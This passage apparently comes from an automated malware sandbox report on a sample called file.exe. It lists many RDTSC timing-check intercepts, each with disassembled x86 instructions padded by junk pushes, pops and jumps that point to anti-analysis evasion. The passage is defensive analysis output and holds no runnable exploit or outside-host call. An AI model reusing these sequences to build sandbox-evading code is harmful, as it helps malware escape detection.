[ebp-10h] 0x00000050 mov dword ptr fs:[00000000h], eax 0x00000056 ret 0x00000057 pushad 0x00000058 movzx ecx, dx 0x0000005b jmp 00007F48A0C206DDh 0x00000060 popad 0x00000061 sub esi, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F48A0C206DAh 0x0000006a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0CDD second address: 49B0CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e pushad 0x0000000f mov edx, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F48A0C1C53Ch 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D26 second address: 49B0D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D2C second address: 49B0D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d jmp 00007F48A0C1C53Eh 0x00000012 je 00007F4911CB016Ch 0x00000018 pushad 0x00000019 mov eax, 7BD0AF8Dh 0x0000001e mov edx, eax 0x00000020 popad 0x00000021 cmp dword ptr [ebp+08h], 00002000h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F48A0C1C53Bh 0x0000002f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A64 second address: 49C0A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C206DCh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A74 second address: 49C0A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A8C second address: 49C0A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A90 second address: 49C0A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0A96 second address: 49C0AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 52556BCEh 0x00000008 movsx ebx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0AAD second address: 49C0AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C541h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0AC2 second address: 49C0AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0AC6 second address: 49C0B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d push ebx 0x0000000e mov ecx, 01343E51h 0x00000013 pop eax 0x00000014 popad 0x00000015 push ebp 0x00000016 jmp 00007F48A0C1C53Ah 0x0000001b mov dword ptr [esp], esi 0x0000001e jmp 00007F48A0C1C540h 0x00000023 mov esi, dword ptr [ebp+0Ch] 0x00000026 pushad 0x00000027 mov edx, ecx 0x00000029 pushfd 0x0000002a jmp 00007F48A0C1C53Ah 0x0000002f sub eax, 71FDC108h 0x00000035 jmp 00007F48A0C1C53Bh 0x0000003a popfd 0x0000003b popad 0x0000003c test esi, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 mov si, 2411h 0x00000044 pushfd 0x00000045 jmp 00007F48A0C1C53Eh 0x0000004a xor al, 00000068h 0x0000004d jmp 00007F48A0C1C53Bh 0x00000052 popfd 0x00000053 popad 0x00000054 call 00007F48A0C1C548h 0x00000059 pushad 0x0000005a popad 0x0000005b pop eax 0x0000005c popad 0x0000005d je 00007F4911CA9D8Dh 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F48A0C1C53Ah 0x0000006a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0B72 second address: 49C0BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F48A0C206DAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [75AB459Ch], 05h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F48A0C206E7h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0BA5 second address: 49C0C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F48A0C1C53Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F48A0C1C549h 0x0000000f add si, B1A6h 0x00000014 jmp 00007F48A0C1C541h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F4911CC1DE1h 0x00000023 jmp 00007F48A0C1C53Eh 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F48A0C1C53Eh 0x00000030 xor ecx, 2719AA78h 0x00000036 jmp 00007F48A0C1C53Bh 0x0000003b popfd 0x0000003c mov dh, ch 0x0000003e popad 0x0000003f push eax 0x00000040 jmp 00007F48A0C1C542h 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F48A0C1C548h 0x0000004f jmp 00007F48A0C1C545h 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D25 second address: 49C0D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D29 second address: 49C0D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA180F second address: 5EA184E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F48A0C206E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F48A0C206E0h 0x00000012 jmp 00007F48A0C206E2h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA184E second address: 5EA1857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA1857 second address: 5EA185F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4677 second address: 5EA46AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F48A0C1C542h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA46AC second address: 5EA46B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA46B0 second address: 5EA46E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007F48A0C1C536h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jmp 00007F48A0C1C541h 0x00000021 je 00007F48A0C1C53Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA46E5 second address: 5EA477B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F48A0C206D8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov ecx, 06CD4BAAh 0x00000025 mov esi, 149CFC7Dh 0x0000002a push 00000003h 0x0000002c mov dx, 7700h 0x00000030 push 00000000h 0x00000032 add dword ptr [ebp+122D32DAh], edi 0x00000038 push 00000003h 0x0000003a jmp 00007F48A0C206E2h 0x0000003f call 00007F48A0C206D9h 0x00000044 push edi 0x00000045 jnp 00007F48A0C206DCh 0x0000004b jp 00007F48A0C206D6h 0x00000051 pop edi 0x00000052 push eax 0x00000053 ja 00007F48A0C206E0h 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 jmp 00007F48A0C206E6h 0x00000067 popad 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA477B second address: 5EA47EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F48A0C1C53Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d ja 00007F48A0C1C54Dh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jne 00007F48A0C1C53Eh 0x0000001d pop eax 0x0000001e mov dword ptr [ebp+122D3509h], edx 0x00000024 lea ebx, dword ptr [ebp+1245A37Dh] 0x0000002a adc dx, 599Fh 0x0000002f mov edi, dword ptr [ebp+122D3B2Ah] 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F48A0C1C542h 0x0000003d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4858 second address: 5EA4864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4864 second address: 5EA4868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4868 second address: 5EA486E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4968 second address: 5EA496C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA496C second address: 5EA4972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4972 second address: 5EA4A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F48A0C1C536h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F48A0C1C546h 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F48A0C1C547h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edx 0x00000022 pushad 0x00000023 jl 00007F48A0C1C536h 0x00000029 jnp 00007F48A0C1C536h 0x0000002f popad 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 jnl 00007F48A0C1C53Ah 0x0000003b pop eax 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F48A0C1C538h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 or dword ptr [ebp+122D2E82h], ebx 0x0000005c call 00007F48A0C1C547h 0x00000061 mov dword ptr [ebp+122D2ADAh], ecx 0x00000067 pop ecx 0x00000068 lea ebx, dword ptr [ebp+1245A388h] 0x0000006e mov edi, edx 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA4A25 second address: 5EA4A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC34DC second address: 5EC34E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC34E0 second address: 5EC3515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F48A0C206E4h 0x0000000d push esi 0x0000000e jmp 00007F48A0C206E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC36A2 second address: 5EC36C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F48A0C1C53Dh 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC36C2 second address: 5EC36D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F48A0C206DDh 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3981 second address: 5EC39B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C1C542h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f je 00007F48A0C1C536h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jnc 00007F48A0C1C538h 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F48A0C1C536h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC39B8 second address: 5EC39BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3AF0 second address: 5EC3B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F48A0C1C545h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3B0C second address: 5EC3B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3B16 second address: 5EC3B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3DF0 second address: 5EC3E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F48A0C206E2h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C206E6h 0x00000013 jnl 00007F48A0C206D6h 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3E27 second address: 5EC3E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C540h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3FDC second address: 5EC3FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4153 second address: 5EC416A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F48A0C1C540h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB7D6A second address: 5EB7D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB7D6F second address: 5EB7D9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F48A0C1C542h 0x00000008 pop ebx 0x00000009 je 00007F48A0C1C538h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F48A0C1C53Ch 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB7D9D second address: 5EB7DBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F48A0C206E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC42B6 second address: 5EC42CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C1C53Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC42CC second address: 5EC42EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F48A0C206E3h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F48A0C206D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4819 second address: 5EC482D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C540h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC482D second address: 5EC4837 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4837 second address: 5EC483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC483D second address: 5EC4841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4B2F second address: 5EC4B3E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F48A0C1C536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4B3E second address: 5EC4B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4B43 second address: 5EC4B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4B49 second address: 5EC4B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4B4D second address: 5EC4B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4F2B second address: 5EC4F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4F42 second address: 5EC4F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F48A0C1C536h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7DBC second address: 5EC7DC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7DC2 second address: 5EC7DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F48A0C1C536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC653E second address: 5EC6544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC6544 second address: 5EC6548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC6C9D second address: 5EC6CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC9175 second address: 5EC9180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F48A0C1C536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E92158 second address: 5E9215D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9215D second address: 5E92196 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F48A0C1C563h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E93D7D second address: 5E93D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F48A0C206D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F48A0C206E4h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E93D9F second address: 5E93DA9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F48A0C1C536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED0F60 second address: 5ED0F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED0F64 second address: 5ED0F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED0F6C second address: 5ED0F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED0F72 second address: 5ED0F85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F48A0C1C536h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED10CE second address: 5ED1106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F48A0C206E9h 0x0000000a pushad 0x0000000b push edx 0x0000000c jno 00007F48A0C206D6h 0x00000012 pop edx 0x00000013 jmp 00007F48A0C206DDh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED126D second address: 5ED1272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1272 second address: 5ED127C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C206DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1871 second address: 5ED1877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1877 second address: 5ED1884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F48A0C206D6h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED1884 second address: 5ED188E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F48A0C1C536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
